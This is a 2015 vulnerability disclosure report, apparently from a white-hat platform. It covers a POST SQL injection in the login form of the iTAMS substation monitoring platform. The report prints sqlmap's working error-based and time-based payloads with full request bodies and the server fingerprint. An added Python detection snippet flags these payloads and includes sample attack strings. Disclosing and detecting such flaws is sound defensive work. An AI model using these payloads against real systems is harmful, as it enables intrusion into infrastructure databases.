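2015-03-05: Details reported to the vendor; awaiting vendor response
2015-03-10: Vendor confirmed; details disclosed to the vendor only
2015-03-20: Details disclosed to core white hats and experts in related fields
2015-03-30: Details disclosed to regular white hats
2015-04-09: Details disclosed to intern white hats
2015-04-20: Details disclosed to the public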
rt
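The txtUserName field of the login form on the iTAMS intelligent substation monitoring platform (http://itams.com.cn/) is vulnerable to POST-based SQL injection.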
sqlmap identified the following injection points with a total of 255 HTTP(s) requests:
---
Parameter: txtUserName (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND EXTRACTVALUE(6496,CONCAT(0x5c,0x71767a7171,(SELECT (CASE WHEN (6496=6496) THEN 1 ELSE 0 END)),0x716b706b71)) AND 'fHDd'='fHDd&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND 8737=BENCHMARK(5000000,MD5(0x50494841)) AND 'tWfU'='tWfU&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.1

[sqlmap table listings for the enumerated databases omitted]
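An added example, not part of the original report: a server-side check that flags the two technique families sqlmap reported above (error-based EXTRACTVALUE and heavy-query BENCHMARK) in the txtUserName field of a login POST body. The rule names, patterns and sample bodies are constructed for illustration; a check like this is a detection aid alongside parameterized queries, not a replacement for them.

```python
import re
from urllib.parse import parse_qs

# Field name is taken from the report; rule names and patterns are assumptions.
LOGIN_FIELD = "txtUserName"

RULES = {
    "error_based": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "time_based": re.compile(r"\b(benchmark|sleep)\s*\(", re.I),
    "quote_breakout": re.compile(r"'\s*(and|or)\b", re.I),
    "subquery": re.compile(r"\(\s*select\b", re.I),
}


def inspect_login_body(body: str) -> list[str]:
    """Return the rules matched by the login field of a url-encoded POST body.

    parse_qs decodes %XX and '+' first, so encoded payloads are matched
    in the same form the application would see them.
    """
    fields = parse_qs(body, keep_blank_values=True)
    hits = []
    for value in fields.get(LOGIN_FIELD, []):
        for name, pattern in RULES.items():
            if pattern.search(value) and name not in hits:
                hits.append(name)
    return hits


# Constructed sample bodies, shortened from the request shapes in the report.
SAMPLES = {
    "benign": "__VIEWSTATE=abc&txtUserName=operator01&txtPassWord=Secret%21",
    "error": "__VIEWSTATE=abc&txtUserName=admin' AND EXTRACTVALUE(1,CONCAT(0x5c,"
             "(SELECT 1))) AND 'a'='a&txtPassWord=123456",
    "timing": "txtUserName=admin' AND 1=BENCHMARK(1000,MD5(1)) AND 'b'='b"
              "&txtPassWord=123456",
    "encoded": "txtUserName=admin%27+AND+extractvalue%281%2C1%29&txtPassWord=x",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:8s} -> {inspect_login_body(body) or 'clean'}")
```
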
Contact the vendor
Severity: High
Vulnerability Rank: 12
Confirmation time: 2015-03-10 13:08
None yet